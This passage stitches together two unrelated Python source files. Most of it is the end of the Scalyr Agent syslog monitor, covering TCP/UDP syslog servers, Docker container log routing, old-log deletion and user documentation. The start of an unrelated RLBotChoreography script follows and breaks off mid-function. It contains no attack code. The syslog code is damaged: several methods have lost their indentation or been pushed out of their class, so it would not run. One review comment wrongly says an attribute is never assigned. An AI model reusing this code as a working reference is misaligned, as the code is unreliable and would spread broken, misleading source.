                    global_log.warning( "Syslog frame exceeded maximum buffer size",
                                        limit_once_per_x_secs=300,
                                        limit_key='syslog-max-buffer-exceeded')
                    handle_frame( self._remaining )
                    frames_handled += 1
                    # add a space to ensure the next frame won't start with a number
                    # and be incorrectly interpreted as a framed message
                    self._remaining = ' '
                    self._offset = 0
                break
            # output the frame
            frame_length = frame_end - self._offset
            handle_frame( self._remaining[self._offset:frame_end].strip() )
            frames_handled += 1
            self._offset += frame_length + skip
        if frames_handled == 0:
            global_log.info('No frames ready to be handled in syslog.. advisory notice',
                            limit_once_per_x_secs=600, limit_key='syslog-no-frames')
        # Keep any unconsumed tail for the next call and reset the offset.
        self._remaining = self._remaining[self._offset:]
        self._offset = 0
class SyslogTCPHandler( SocketServer.BaseRequestHandler ):
    """Class that reads data from a TCP request and passes it to
    a protocol neutral handler
    """
    def handle( self ):
        # Loop reading/processing until the peer disconnects or the server
        # run state says to stop. Any exception ends this connection.
        try:
            request_stream = SyslogRequestParser( self.request, self.server.tcp_buffer_size )
            global_log.log(scalyr_logging.DEBUG_LEVEL_1, "SyslogTCPHandler.handle - created request_stream. Thread: %d", threading.current_thread().ident )
            count = 0
            while not request_stream.is_closed:
                check_running = False
                data = request_stream.read()
                if data is not None:
                    request_stream.process( data, self.server.syslog_handler.handle )
                    # Re-check the run state every 1000 reads even while data
                    # keeps flowing, so shutdown is not starved.
                    count += 1
                    if count > 1000:
                        check_running = True
                        count = 0
                else:
                    # don't hog the CPU
                    time.sleep( 0.01 )
                    check_running = True
                # limit the amount of times we check if the server is still running
                # as this is a time consuming operation due to locking
                if check_running and not self.server.is_running():
                    break
        except Exception, e:
            global_log.warning( "Error handling request: %s\n\t%s", str( e ), traceback.format_exc() )
        global_log.log(scalyr_logging.DEBUG_LEVEL_1, "SyslogTCPHandler.handle - closing request_stream. Thread: %d", threading.current_thread().ident )
class SyslogUDPServer( SocketServer.ThreadingMixIn, SocketServer.UDPServer ):
    """Threaded UDP SocketServer listening on the requested address/port."""

    def __init__( self, port, bind_address, verifier ):
        self.__verifier = verifier
        addr = ( bind_address, port )
        global_log.log(scalyr_logging.DEBUG_LEVEL_1, "UDP Server: binding socket to %s" % str( addr ) )
        self.allow_reuse_address = True
        SocketServer.UDPServer.__init__( self, addr, SyslogUDPHandler )

    def verify_request( self, request, client_address ):
        # Delegate the accept/deny decision to the connection verifier.
        return self.__verifier.verify_request( client_address )

    def set_run_state( self, run_state ):
        """No-op: only TCP connections need the run state."""
        pass
class SyslogTCPServer( SocketServer.ThreadingMixIn, SocketServer.TCPServer ):
    """Threaded TCP SocketServer listening on the requested address/port."""

    def __init__( self, port, tcp_buffer_size, bind_address, verifier ):
        self.__verifier = verifier
        addr = ( bind_address, port )
        global_log.log(scalyr_logging.DEBUG_LEVEL_1, "TCP Server: binding socket to %s" % str( addr ) )
        self.allow_reuse_address = True
        self.__run_state = None
        self.tcp_buffer_size = tcp_buffer_size
        SocketServer.TCPServer.__init__( self, addr, SyslogTCPHandler )

    def verify_request( self, request, client_address ):
        # Delegate the accept/deny decision to the connection verifier.
        return self.__verifier.verify_request( client_address )

    def set_run_state( self, run_state ):
        self.__run_state = run_state

    def is_running( self ):
        # False until set_run_state() has been called.
        if self.__run_state:
            return self.__run_state.is_running()
        return False
class LogDeleter( object ):
    """Deletes unused log files that match a log_file_template

    Every check_interval_mins, any file matching the template glob that has
    not been modified for delete_interval_hours (and is not in the caller's
    set of active logs) is removed, along with its rotated copies.
    """
    def __init__( self, check_interval_mins, delete_interval_hours, check_rotated_timestamps, max_log_rotations, log_path, log_file_template ):
        self._check_interval = check_interval_mins * 60
        self._delete_interval = delete_interval_hours * 60 * 60
        self._check_rotated_timestamps = check_rotated_timestamps
        self._max_log_rotations = max_log_rotations
        # Glob matching every file the template could have produced.
        self._log_glob = os.path.join( log_path, log_file_template.safe_substitute( CID='*', CNAME='*' ) )
        self._last_check = time.time()
    def _get_old_logs_for_glob( self, current_time, glob_pattern, existing_logs, check_rotated, max_rotations ):
        # Collect stale files matching glob_pattern. For each stale main log,
        # also collect its rotated siblings (name.1 .. name.max_rotations):
        # either individually by timestamp (check_rotated) or together with
        # the main file.
        result = []
        for matching_file in glob.glob( glob_pattern ):
            try:
                added = False
                mtime = os.path.getmtime(matching_file)
                if current_time - mtime > self._delete_interval and matching_file not in existing_logs:
                    result.append( matching_file )
                    added = True
                for i in range( max_rotations, 0, -1 ):
                    rotated_file = matching_file + ('.%d' % i)
                    try:
                        if not os.path.isfile( rotated_file ):
                            continue
                        if check_rotated:
                            mtime = os.path.getmtime(rotated_file)
                            if current_time - mtime > self._delete_interval:
                                result.append( rotated_file )
                        else:
                            if added:
                                result.append( rotated_file )
                    except OSError, e:
                        global_log.warn( "Unable to read modification time for file '%s', %s" % (rotated_file, str(e)),
                                         limit_once_per_x_secs=300,
                                         limit_key='mtime-%s'%rotated_file)
            except OSError, e:
                global_log.warn( "Unable to read modification time for file '%s', %s" % (matching_file, str(e)),
                                 limit_once_per_x_secs=300,
                                 limit_key='mtime-%s'%matching_file)
        return result
    def check_for_old_logs( self, existing_logs ):
        """Delete stale logs if the check interval has elapsed.

        @param existing_logs: log paths that are still in use and must be
            kept regardless of age.
        """
        old_logs = []
        current_time = time.time()
        if current_time - self._last_check > self._check_interval:
            old_logs = self._get_old_logs_for_glob( current_time, self._log_glob, existing_logs, self._check_rotated_timestamps, self._max_log_rotations )
            self._last_check = current_time
        for filename in old_logs:
            try:
                os.remove( filename )
                global_log.log(scalyr_logging.DEBUG_LEVEL_1, "Deleted old log file '%s'" % filename )
            except OSError, e:
                global_log.warn( "Error deleting old log file '%s', %s" % (filename, str(e)),
                                 limit_once_per_x_secs=300,
                                 limit_key='delete-%s'%filename)
class SyslogHandler(object):
    """Protocol neutral class for handling messages that come in from a syslog server

    @param line_reporter A function to invoke whenever the server handles lines. The number of lines
    must be supplied as the first argument.
    """
    def __init__( self, logger, line_reporter, config, server_host, log_path, get_log_watcher, rotate_options ):
        # Docker mode enables per-container log files and id->name resolution.
        docker_logging = config.get('mode') == 'docker'
        self.__docker_regex = None
        self.__docker_regex_full = None
        self.__docker_id_resolver = None
        self.__docker_file_template = None
        self.__docker_log_deleter = None
        # Fallback rotation defaults when the caller supplies none:
        # 2 backups, 20 MB per file.
        if rotate_options is None:
            rotate_options = (2, 20*1024*1024)
        default_rotation_count, default_max_bytes = rotate_options
        # Per-monitor config overrides the defaults when explicitly set.
        rotation_count = config.get( 'max_log_rotations' )
        if rotation_count is None:
            rotation_count = default_rotation_count
        max_log_size = config.get( 'max_log_size' )
        if max_log_size is None:
            max_log_size = default_max_bytes
        if docker_logging:
            self.__docker_regex_full = self.__get_regex(config, 'docker_regex_full')
            self.__docker_regex = self.__get_regex(config, 'docker_regex')
            self.__docker_file_template = Template(config.get('docker_logfile_template'))
            self.__docker_log_deleter = LogDeleter( config.get( 'docker_check_for_unused_logs_mins' ),
                                                    config.get( 'docker_delete_unused_logs_hours' ),
                                                    config.get( 'docker_check_rotated_timestamps' ),
                                                    rotation_count,
                                                    log_path,
                                                    self.__docker_file_template )
            if config.get('docker_use_daemon_to_resolve'):
                # Imported lazily so non-docker deployments don't need the
                # docker monitor's dependencies.
                from scalyr_agent.builtin_monitors.docker_monitor import ContainerIdResolver
                self.__docker_id_resolver = ContainerIdResolver(config.get('docker_api_socket'),
                                                                config.get('docker_api_version'),
                                                                global_log,
                                                                cache_expiration_secs=config.get(
                                                                    'docker_cid_cache_lifetime_secs'),
                                                                cache_clean_secs=config.get(
                                                                    'docker_cid_clean_time_secs'))
        self.__log_path = log_path
        self.__server_host = server_host
        self.__get_log_watcher = get_log_watcher
        self.__logger = logger
        self.__line_reporter = line_reporter
        self.__docker_logging = docker_logging
        # Per-container loggers and the cid->name cache, both guarded by
        # __logger_lock.
        self.__docker_loggers = {}
        self.__container_names = {}
        self.__expire_count = 0
        self.__logger_lock = threading.Lock()
        self.__docker_expire_log = config.get( 'docker_expire_log' )
        self.__max_log_rotations = rotation_count
        self.__max_log_size = max_log_size
        self.__flush_delay = config.get('log_flush_delay')
def __get_regex(self, config, field_name):
value = config.get(field_name)
if len(value) > 0:
return re.compile(value)
else:
return None
def __create_log_config( self, cname, cid ):
full_path = os.path.join( self.__log_path, self.__docker_file_template.safe_substitute(
{'CID': cid, 'CNAME': cname}))
log_config = {
'parser': 'agentSyslogDocker',
'path': full_path
}
return log_config
    def __extra_attributes( self, cname, cid ):
        """Build the attribute JsonObject attached to a container's log:
        monitor name, container name/id and (when configured) serverHost.
        """
        attributes = None
        try:
            attributes = JsonObject( {
                "monitor": "agentSyslog",
                "containerName": cname,
                "containerId": cid
            } )
            if self.__server_host:
                attributes['serverHost'] = self.__server_host
        except Exception, e:
            global_log.error( "Error setting docker logger attribute in SyslogMonitor" )
            raise
        return attributes
    def __create_log_file( self, cname, cid, log_config ):
        """create our own rotating logger which will log raw messages out to disk.

        Returns the AutoFlushingRotatingFile, or None if it could not be
        opened (the error is logged rather than raised).
        """
        result = None
        try:
            result = AutoFlushingRotatingFile( filename = log_config['path'],
                                               max_bytes = self.__max_log_size,
                                               backup_count = self.__max_log_rotations,
                                               flush_delay = self.__flush_delay)
        except Exception, e:
            global_log.error( "Unable to open SyslogMonitor log file: %s" % str( e ) )
            result = None
        return result
    def __extract_container_name_and_id(self, data):
        """Attempts to extract the container id and container name from the log line received from Docker via
        syslog.

        First, attempts to extract container id using `__docker_regex` and look up the container name via Docker.
        If that fails, attempts to extract the container id and container name using the `__docker_regex_full`.

        @param data: The incoming line
        @type data: str
        @return: The container name, container id, and the rest of the line if extract was successful. Otherwise,
            None, None, None.
        @rtype: str, str, str
        """
        # The reason flags contains some information about the code path used when a container id is not found.
        # We emit this to the log to help us debug customer issues.
        reason_flags = ''
        if self.__docker_regex is not None and self.__docker_id_resolver is not None:
            reason_flags += '1'
            m = self.__docker_regex.match(data)
            if m is not None:
                reason_flags += '2'
                #global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Matched cid-only syslog format')
                cid = m.group(1)
                cname = None
                # The cid->name cache is shared across connections, so the
                # lookup-and-fill must happen under the logger lock.
                self.__logger_lock.acquire()
                try:
                    if cid not in self.__container_names:
                        reason_flags += '3'
                        self.__container_names[cid] = self.__docker_id_resolver.lookup(cid)
                    cname = self.__container_names[cid]
                finally:
                    self.__logger_lock.release()
                if cid is not None and cname is not None:
                    #global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Resolved container name')
                    return cname, cid, data[m.end():]
        # Fall back to the tag format that carries both name and id.
        if self.__docker_regex_full is not None:
            reason_flags += '4'
            m = self.__docker_regex_full.match(data)
            if m is not None:
                reason_flags += '5'
            if m is not None and m.lastindex == 2:
                #global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Matched cid/cname syslog format')
                return m.group(1), m.group(2), data[m.end():]
        # Neither regex produced a usable container: warn (rate limited)
        # with the reason flags and a prefix of the offending line.
        regex_str = self.__get_pattern_str(self.__docker_regex)
        regex_full_str = self.__get_pattern_str(self.__docker_regex_full)
        global_log.warn('Could not determine container from following incoming data. Container logs may be '
                        'missing, performance could be impacted. Data(%s): "%s" Did not match either single '
                        'regex: "%s" or full regex: "%s"' % (reason_flags, data[:70], regex_str, regex_full_str),
                        limit_once_per_x_secs=300, limit_key='syslog_docker_cid_not_extracted')
        #global_log.log(scalyr_logging.DEBUG_LEVEL_3, 'Could not extract cid/cname for "%s"', data)
        return None, None, None
def __get_pattern_str(self, regex_value):
    """Helper method for getting the string version of a compiled regular expression.  Also handles if the regex
    is None, in which case the string 'None' is returned.
    """
    if regex_value is None:
        return str(None)
    return str(regex_value.pattern)
def __handle_docker_logs( self, data ):
    """Route one syslog message from a docker container to that container's own log file.

    Creates a per-container rotating log (registering it with the agent's log
    watcher) on first sight of a container, expires loggers that have not been
    seen recently, and falls back to the main syslog file when the container
    cannot be identified or its logger could not be created.
    """
    watcher = None
    module = None
    # log watcher for adding/removing logs from the agent
    if self.__get_log_watcher:
        watcher, module = self.__get_log_watcher()

    (cname, cid, line_content) = self.__extract_container_name_and_id(data)
    if cname is None:
        # Could not identify the container; a rate-limited warning was already
        # emitted by __extract_container_name_and_id.
        return

    current_time = time.time()
    current_log_files = []
    # All access to __docker_loggers / __expire_count happens under the lock.
    self.__logger_lock.acquire()
    try:
        logger = None
        if cname is not None and cid is not None:
            # check if we already have a logger for this container
            # and if not, then create it
            if cname not in self.__docker_loggers:
                info = dict()
                # get the config and set the attributes
                info['log_config'] = self.__create_log_config( cname, cid )
                info['cid'] = cid
                attributes = self.__extra_attributes( cname, cid )
                if attributes:
                    info['log_config']['attributes'] = attributes
                # create the physical log files
                info['logger'] = self.__create_log_file( cname, cid, info['log_config'] )
                info['last_seen'] = current_time
                # if we created the log file
                if info['logger']:
                    # add it to the main scalyr log watcher
                    if watcher and module:
                        info['log_config'] = watcher.add_log_config( module, info['log_config'] )
                    # and keep a record for ourselves
                    self.__docker_loggers[cname] = info
                else:
                    # Could not open the file; drop this message (lock is
                    # released by the finally block below).
                    global_log.warn( "Unable to create logger for %s." % cname )
                    return
            # at this point __docker_loggers will always contain
            # a logger for this container name, so log the message
            # and mark the time
            logger = self.__docker_loggers[cname]
            logger['last_seen'] = current_time

        # Only scan for expired loggers every RUN_EXPIRE_COUNT messages, to
        # avoid iterating the whole map on every single syslog line.
        if self.__expire_count >= RUN_EXPIRE_COUNT:
            self.__expire_count = 0
            # find out which if any of the loggers in __docker_loggers have
            # expired
            expired = []
            for key, info in self.__docker_loggers.iteritems():
                if current_time - info['last_seen'] > self.__docker_expire_log:
                    expired.append( key )
            # remove all the expired loggers
            for key in expired:
                info = self.__docker_loggers.pop( key, None )
                if info:
                    info['logger'].close()
                    if watcher and module:
                        watcher.remove_log_path( module.module_name, info['log_config']['path'] )
        self.__expire_count += 1

        # Snapshot the set of live log paths for the old-log cleanup below.
        for key, info in self.__docker_loggers.iteritems():
            current_log_files.append( info['log_config']['path'] )
    finally:
        self.__logger_lock.release()

    # Write outside the lock: either to the container's own log, or fall back
    # to the main syslog file (rate-limited warning when that happens).
    if logger:
        logger['logger'].write(line_content)
    else:
        global_log.warning('Syslog writing docker logs to syslog file instead of container log',
                           limit_once_per_x_secs=600, limit_key='syslog-docker-not-container-log')
        self.__logger.info( data )

    # NOTE(review): __docker_log_deleter is not assigned in the visible part of
    # __init__ — presumably set elsewhere; confirm before relying on it.
    if self.__docker_log_deleter:
        self.__docker_log_deleter.check_for_old_logs( current_log_files )
def handle( self, data ):
    """Entry point for one complete syslog message received by the server.

    Routes the message to per-container docker logs when docker mode is on,
    otherwise writes it to the main syslog log file, then reports line counts.
    """
    if not self.__docker_logging:
        self.__logger.info( data )
    else:
        self.__handle_docker_logs( data )
    # The calling code strips off the trailing newlines, so add one back when
    # counting how many lines this message contained.
    self.__line_reporter(data.count('\n') + 1)
class RequestVerifier( object ):
    """Decides whether or not an incoming syslog request should be processed,
    based on the state of various config options.

    In docker mode, only remote connections that are explicitly allowed (via
    the accept-remote flag or the accept-ip whitelist) are served; in all
    other modes every request is accepted.
    """

    def __init__( self, accept_remote, accept_ips, docker_logging ):
        self.__accept_remote = accept_remote
        self.__accept_ips = accept_ips
        self.__docker_logging = docker_logging

    def verify_request( self, client_address ):
        """Return True when the client at `client_address` (an (address, port)
        tuple) may be served."""
        address, port = client_address
        # Non-docker mode accepts everything.
        if not self.__docker_logging:
            return True
        accepted = self.__accept_remote or address in self.__accept_ips
        if not accepted:
            global_log.log(scalyr_logging.DEBUG_LEVEL_4, "Rejecting request from %s" % str( client_address ) )
        return accepted
class SyslogServer(object):
    """Abstraction for a syslog server, that creates either a UDP or a TCP server, and
    configures a handler to process messages.

    This removes the need for users of this class to care about the underlying protocol being used

    @param line_reporter A function to invoke whenever the server handles lines.  The number of lines
        must be supplied as the first argument.
    """
    def __init__( self, protocol, port, logger, config, line_reporter, accept_remote=False, server_host=None, log_path=None, get_log_watcher=None, rotate_options=None):
        server = None
        # In docker mode with no explicit whitelist, default to accepting
        # only from the container's default gateway (the docker host).
        accept_ips = config.get( 'docker_accept_ips' )
        if accept_ips == None:
            accept_ips = []
            gateway_ip = _get_default_gateway()
            if gateway_ip:
                accept_ips = [ gateway_ip ]

        global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Accept ips are: %s" % str( accept_ips ) );

        docker_logging = config.get( 'mode' ) == 'docker'
        verifier = RequestVerifier( accept_remote, accept_ips, docker_logging )

        try:
            bind_address = self.__get_bind_address( docker_logging=docker_logging, accept_remote=accept_remote )
            if protocol == 'tcp':
                global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Starting TCP Server" )
                server = SyslogTCPServer( port, config.get( 'tcp_buffer_size' ), bind_address=bind_address, verifier=verifier )
            elif protocol == 'udp':
                global_log.log(scalyr_logging.DEBUG_LEVEL_2, "Starting UDP Server" )
                server = SyslogUDPServer( port, bind_address=bind_address, verifier=verifier )
        except socket_error, e:
            # Low ports need root; give a clearer error in that common case.
            if e.errno == errno.EACCES and port < 1024:
                raise Exception( 'Access denied when trying to create a %s server on a low port (%d). '
                                 'Please try again on a higher port, or as root.' % (protocol, port) )
            else:
                raise

        #don't continue if the config had a protocol we don't recognize
        if server is None:
            raise Exception( 'Unknown value \'%s\' specified for SyslogServer \'protocol\'.' % protocol )

        #create the syslog handler, and add to the list of servers
        server.syslog_handler = SyslogHandler( logger, line_reporter, config, server_host, log_path, get_log_watcher, rotate_options )
        server.syslog_transport_protocol = protocol
        server.syslog_port = port

        self.__server = server
        self.__thread = None

    def __get_bind_address( self, docker_logging=False, accept_remote=False ):
        """Return the interface to bind on: '' (all interfaces) when remote
        connections are allowed or when running inside a docker container,
        otherwise 'localhost'."""
        result = 'localhost'
        if accept_remote:
            result = ''
        else:
            # check if we are running inside a docker container
            if docker_logging and os.path.isfile( '/.dockerenv' ):
                # need to accept from remote ips
                result = ''
        return result

    def __prepare_run_state( self, run_state ):
        """Wire the agent's run_state into the server so a stop request shuts
        the server down."""
        if run_state is not None:
            server = self.__server
            server.set_run_state( run_state )
            #shutdown is only available from python 2.6 onwards
            #need to think of what to do for 2.4, which will hang on shutdown when run as standalone
            if hasattr( server, 'shutdown' ):
                run_state.register_on_stop_callback( server.shutdown )

    def start( self, run_state ):
        """Run the server on the current thread until run_state is stopped."""
        self.__prepare_run_state( run_state )
        self.__server.serve_forever()
        self.__server.socket.close()

    def start_threaded( self, run_state ):
        """Run the server on its own StoppableThread (used for secondary
        protocol/port combinations)."""
        self.__prepare_run_state( run_state )
        self.__thread = StoppableThread( target=self.start, name="Syslog monitor thread for %s:%d" % (self.__server.syslog_transport_protocol, self.__server.syslog_port) )
        self.__thread.start()

    def stop( self, wait_on_join=True, join_timeout=5 ):
        if self.__thread is not None:
            self.__thread.stop( wait_on_join=wait_on_join, join_timeout=join_timeout )
class SyslogMonitor( ScalyrMonitor ):
    """
# Syslog Monitor

The Syslog monitor allows the Scalyr Agent to act as a syslog server, proxying logs from any application or device
that supports syslog. It can recieve log messages via the syslog TCP or syslog UDP protocols.

@class=bg-warning docInfoPanel: An *agent monitor plugin* is a component of the Scalyr Agent. To use a plugin,
simply add it to the ``monitors`` section of the Scalyr Agent configuration file (``/etc/scalyr/agent.json``).
For more information, see [Agent Plugins](/help/scalyr-agent#plugins).

## Sample Configuration

This sample will configure the agent to accept syslog messages on TCP port 601 and UDP port 514, from localhost
only:

    monitors: [
      {
        module: "scalyr_agent.builtin_monitors.syslog_monitor",
        protocols: "tcp:601, udp:514",
        accept_remote_connections: false
      }
    ]

You can specify any number of protocol/port combinations. Note that on Linux, to use port numbers 1024 or lower,
the agent must be running as root.

You may wish to accept syslog connections from other devices on the network, such as a firewall or router which
exports logs via syslog. Set ``accept_remote_connections`` to true to allow this.

Additional options are documented in the Configuration Reference section, below.

## Log files and parsers

By default, all syslog messages are written to a single log file, named ``agentSyslog.log``. You can use the
``message_log`` option to specify a different file name (see Configuration Reference).

If you'd like to send messages from different devices to different log files, you can include multiple syslog_monitor
stanzas in your configuration file. Specify a different ``message_log`` for each monitor, and have each listen on a
different port number. Then configure each device to send to the appropriate port.

syslog_monitor logs use a parser named ``agentSyslog``. To set up parsing for your syslog messages, go to the
[Parser Setup Page](/parsers?parser=agentSyslog) and click {{menuRef:Leave it to Us}} or
{{menuRef:Build Parser By Hand}}. If you are using multiple syslog_monitor stanzas, you can specify a different
parser for each one, using the ``parser`` option.

## Sending messages via syslog

To send messages to the Scalyr Agent using the syslog protocol, you must configure your application or network
device. The documentation for your application or device should include instructions. We'll be happy to help out;
please drop us a line at [support@scalyr.com](mailto:support@scalyr.com).

### Rsyslogd

To send messages from another Linux host, you may wish to use the popular ``rsyslogd`` utility. rsyslogd has a
powerful configuration language, and can be used to forward all logs or only a selected set of logs.

Here is a simple example. Suppose you have configured Scalyr's Syslog Monitor to listen on TCP port 601, and you
wish to use rsyslogd on the local host to upload system log messages of type ``authpriv``. You would add the following
lines to your rsyslogd configuration, which is typically in ``/etc/rsyslogd.conf``:

    # Send all authpriv messasges to Scalyr.
    authpriv.* @@localhost:601

Make sure that this line comes before any other filters that could match the authpriv messages. The ``@@`` prefix
specifies TCP.

## Viewing Data

Messages uploaded by the Syslog Monitor will appear as an independent log file on the host where the agent is
running. You can find this log file in the [Overview](/logStart) page. By default, the file is named "agentSyslog.log".
    """
    def _initialize( self ):
        """Set up monitor state from config; called once before run()."""
        #the main server
        self.__server = None
        #any extra servers if we are listening for multiple protocols
        self.__extra_servers = []
        #build list of protocols and ports from the protocol option
        self.__server_list = self.__build_server_list( self._config.get( 'protocols' ) )
        #our disk logger and handler
        self.__disk_logger = None
        self.__log_handler = None
        #whether or not to accept only connections created on this localhost.
        self.__accept_remote_connections = self._config.get( 'accept_remote_connections' )
        self.__server_host = None
        self.__log_path = ''
        if self._global_config:
            self.__log_path = self._global_config.agent_log_path
            if self._global_config.server_attributes:
                if 'serverHost' in self._global_config.server_attributes:
                    self.__server_host = self._global_config.server_attributes['serverHost']
        self.__log_watcher = None
        self.__module = None
        #configure the logger and path
        self.__message_log = self._config.get( 'message_log' )
        self.log_config = {
            'parser': self._config.get( 'parser' ),
            'path': self.__message_log,
        }
        self.__flush_delay = self._config.get('log_flush_delay')
        try:
            attributes = JsonObject( { "monitor": "agentSyslog" } )
            self.log_config['attributes'] = attributes
        except Exception, e:
            global_log.error( "Error setting monitor attribute in SyslogMonitor" )
        # Fall back to the agent-wide rotation settings when the monitor
        # config does not override them.
        default_rotation_count, default_max_bytes = self._get_log_rotation_configuration()
        self.__max_log_size = self._config.get( 'max_log_size' )
        if self.__max_log_size is None:
            self.__max_log_size = default_max_bytes
        self.__max_log_rotations = self._config.get( 'max_log_rotations' )
        if self.__max_log_rotations is None:
            self.__max_log_rotations = default_rotation_count

    def __build_server_list( self, protocol_string ):
        """Builds a list containing (protocol, port) tuples, based on a comma separated list
        of protocols and optional ports e.g. protocol[:port], protocol[:port]
        """
        #split out each protocol[:port]
        protocol_list = [p.strip().lower() for p in protocol_string.split(',')]
        if len( protocol_list ) == 0:
            raise Exception('Invalid config state for Syslog Monitor. '
                            'No protocols specified')
        default_ports = { 'tcp': 601,
                          'udp': 514,
                        }
        server_list = []
        #regular expression matching protocol:port
        port_re = re.compile( '^(tcp|udp):(\d+)$' )
        for p in protocol_list:
            #protocol defaults to the full p for when match fails
            protocol = p
            port = 0
            m = port_re.match( p )
            if m:
                protocol = m.group(1)
                port = int( m.group(2) )
            if protocol in default_ports:
                #get the default port for this protocol if none was specified
                if port == 0:
                    port = default_ports[protocol]
            else:
                raise Exception( 'Unknown value \'%s\' specified for SyslogServer \'protocol\'.' % protocol )
            #only allow ports between 1 and 65535
            if port < 1 or port > 65535:
                raise Exception( 'Port values must be in the range 1-65535.  Current value: %d.' % port )
            server_list.append( (protocol, port) )
        #return a list with duplicates removed
        return list( set( server_list ) )

    def open_metric_log( self ):
        """Override open_metric_log to prevent a metric log from being created for the Syslog Monitor
        and instead create our own logger which will log raw messages out to disk.
        """
        name = __name__ + '-' + self.__message_log + '.syslog'
        self.__disk_logger = logging.getLogger( name )
        #assume successful for when the logger handler has already been created
        success = True
        #only configure once -- assumes all configuration happens on the same thread
        if len( self.__disk_logger.handlers ) == 0:
            #logger handler hasn't been created yet, so assume unsuccessful
            success = False
            try:
                self.__log_handler = AutoFlushingRotatingFileHandler( filename = self.log_config['path'],
                                                                      maxBytes = self.__max_log_size,
                                                                      backupCount = self.__max_log_rotations,
                                                                      flushDelay = self.__flush_delay)
                formatter = logging.Formatter()
                self.__log_handler.setFormatter( formatter )
                self.__disk_logger.addHandler( self.__log_handler )
                self.__disk_logger.setLevel( logging.INFO )
                # Don't let raw syslog lines bubble up into the agent's logs.
                self.__disk_logger.propagate = False
                success = True
            except Exception, e:
                global_log.error( "Unable to open SyslogMonitor log file: %s" % str( e ) )
        return success

    def close_metric_log( self ):
        """Detach and close our raw-message disk log handler."""
        if self.__log_handler:
            self.__disk_logger.removeHandler( self.__log_handler )
            self.__log_handler.close()

    def set_log_watcher( self, log_watcher ):
        self.__log_watcher = log_watcher

    def __get_log_watcher( self ):
        """Return the (watcher, module) pair handed to each SyslogHandler."""
        return (self.__log_watcher, self)

    def run( self ):
        """Create one SyslogServer per configured protocol/port and serve
        until the monitor is stopped. The first server runs on this thread;
        the rest run on their own threads."""
        def line_reporter(num_lines):
            self.increment_counter(reported_lines=num_lines)

        rotate_options = self._get_log_rotation_configuration()
        try:
            if self.__disk_logger is None:
                raise Exception( "No disk logger available for Syslog Monitor" )

            #create the main server from the first item in the server list
            protocol = self.__server_list[0]
            self.__server = SyslogServer( protocol[0], protocol[1], self.__disk_logger, self._config,
                                          line_reporter, accept_remote=self.__accept_remote_connections,
                                          server_host=self.__server_host, log_path=self.__log_path,
                                          get_log_watcher=self.__get_log_watcher, rotate_options=rotate_options )

            #iterate over the remaining items creating servers for each protocol
            for p in self.__server_list[1:]:
                server = SyslogServer( p[0], p[1], self.__disk_logger, self._config,
                                       line_reporter, accept_remote=self.__accept_remote_connections,
                                       server_host=self.__server_host, log_path=self.__log_path,
                                       get_log_watcher=self.__get_log_watcher, rotate_options=rotate_options )
                self.__extra_servers.append( server )

            #start any extra servers in their own threads
            for server in self.__extra_servers:
                server.start_threaded( self._run_state )

            #start the main server
            self.__server.start( self._run_state )
        except Exception, e:
            global_log.exception('Monitor died due to exception:', error_code='failedMonitor')
            raise

    def stop(self, wait_on_join=True, join_timeout=5):
        #stop the main server
        ScalyrMonitor.stop( self, wait_on_join=wait_on_join, join_timeout=join_timeout )
        #stop any extra servers
        for server in self.__extra_servers:
            server.stop( wait_on_join, join_timeout )
|
__main__.py | """RLBotChoreography"""
import copy
import os
import sys
import inspect
import time
from importlib import reload, import_module
from queue import Queue
from threading import Thread
from os.path import dirname, basename, isfile, join
import glob
from rlbot.matchconfig.conversions import parse_match_config
from rlbot.matchconfig.match_config import PlayerConfig
from rlbot.parsing.agent_config_parser import load_bot_appearance, create_looks_configurations
from rlbot.parsing.bot_config_bundle import get_bot_config_bundle
from rlbot.parsing.directory_scanner import scan_directory_for_bot_configs
from rlbot.parsing.rlbot_config_parser import create_bot_config_layout
from rlbot.setup_manager import SetupManager
from rlbot.utils.structures.start_match_structures import MAX_PLAYERS
import hivemind
from queue_commands import QCommand
from choreography.choreography import Choreography
# TODO:
# - Prettify GUI
class RLBotChoreography:
    """Top-level orchestrator: runs the tkinter control GUI and the Hivemind
    bot controller on two separate threads, communicating over a Queue of
    QCommand values."""

    def __init__(self):
        # Runs GUI and Hivemind on two different threads.
        q = Queue()
        thread1 = Thread(target=self.run_gui, args=(q,))
        thread1.start()
        thread2 = Thread(target=self.run_RLBotChoreography, args=(q,))
        thread2.start()
        q.join()

    def setup_match(self):
        """Build the RLBot match configuration from rlbot.cfg and the selected
        choreography (map, appearances, teams, names), then start the match."""
        # Set up RLBot.cfg
        framework_config = create_bot_config_layout()
        config_location = os.path.join(os.path.dirname(__file__), 'rlbot.cfg')
        framework_config.parse_file(config_location, max_index=MAX_PLAYERS)
        match_config = parse_match_config(framework_config, config_location, {}, {})
        match_config.game_map = self.choreo_obj.map_name

        # The three blocks of code below are basically identical.
        # TODO Make them into a function?

        # Gets appearance list from choreo.
        appearances = self.choreo_obj.get_appearances(self.min_bots)
        # Checks that it is the correct length.
        if len(appearances) != self.min_bots:
            print('[RLBotChoreography]: Number of appearances does not match number of bots.')
            print('[RLBotChoreography]: Using default appearances.')
            appearances = ['default.cfg'] * self.min_bots

        # Gets teams list from choreo.
        teams = self.choreo_obj.get_teams(self.min_bots)
        # Checks that it is the correct length.
        if len(teams) != self.min_bots:
            print('[RLBotChoreography]: Number of teams does not match number of bots.')
            print('[RLBotChoreography]: Putting all on blue.')
            teams = [0] * self.min_bots

        # Gets names list from choreo.
        names = self.choreo_obj.get_names(self.min_bots)
        # Checks that it is the correct length.
        if len(names) != self.min_bots:
            print('[RLBotChoreography]: Number of names does not match number of bots.')
            print('[RLBotChoreography]: Using bot indices as names.')
            names = range(self.min_bots)

        # Loads appearances.
        looks_configs = {
            idx: create_looks_configurations().parse_file(
                os.path.abspath('./ChoreographyHive/appearances/' + file_name))
            for idx, file_name in enumerate(appearances)
        }

        # rlbot.cfg specifies only one bot,
        # so we have to copy each and assign correct appearance.
        player_config = match_config.player_configs[0]
        match_config.player_configs.clear()
        for i in range(self.min_bots):
            copied = PlayerConfig()
            copied.name = names[i]
            copied.team = teams[i]
            copied.bot = player_config.bot
            copied.rlbot_controlled = player_config.rlbot_controlled
            copied.config_path = player_config.config_path
            copied.loadout_config = load_bot_appearance(looks_configs[i], copied.team)
            match_config.player_configs.append(copied)

        manager = SetupManager()
        manager.load_match_config(match_config, {})
